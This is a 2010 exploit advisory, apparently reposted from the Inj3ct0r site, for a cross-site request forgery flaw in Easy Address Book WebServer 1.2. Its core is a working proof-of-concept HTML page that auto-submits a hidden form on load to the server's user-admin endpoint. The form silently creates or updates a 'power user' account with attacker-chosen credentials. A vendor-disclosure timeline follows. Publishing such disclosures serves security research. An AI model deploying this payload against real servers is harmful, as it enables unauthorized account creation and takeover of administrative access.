Home / os / win7

Easy Address book Webserver 1.2 CSRF

Posted on 26 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Easy Address book Webserver 1.2 CSRF</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>====================================
Easy Address book Webserver 1.2 CSRF
====================================


# Software      : Easy Address Book WebServer 1.2
# Author        : Markot
# Date          : May 25, 2010
# OS            : Windows
# Tested on     : XP SP3 En (Virtual box)
# Type of vuln  : CSRF
# Greetz to     : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
 
#code
 
 &lt;html&gt;
 &lt;body&gt;
 &lt;body onload=&quot;document.forms['Login'].submit();&quot;&gt;
 &lt;form method=&quot;POST&quot; name=&quot;Login&quot; action=&quot;http://192.168.1.200:80/users_admin.ghp&quot;&gt;
 &lt;input type=&quot;hidden&quot; name=&quot;userid&quot; value=&quot;3&quot;/&gt;
 &lt;input type=&quot;hidden&quot; name=&quot;username&quot; value=&quot;corelanteam&quot;/&gt;
 &lt;input type=&quot;hidden&quot; name=&quot;password&quot; value=&quot;corelanteam&quot;/&gt;
 &lt;input type=&quot;hidden&quot; name=&quot;email&quot; value=&quot;markot@corelan.be&quot;/&gt;
 &lt;input type=&quot;hidden&quot; name=&quot;level&quot; value=&quot;power user&quot;/&gt;
 &lt;input type=&quot;hidden&quot; name=&quot;state&quot; value=&quot;Enable&quot;/&gt;
 &lt;input type=&quot;hidden&quot; name=&quot;add_user&quot; value=&quot;Update&quot;/&gt;
 &lt;/form&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 
Author/Vendor communication
 
 May 1 2010 : vendor contacted
 
 May 17 2010: reminder sent, no feedback from the vendor
 
 May 25 2010: Public disclosure


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-26]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP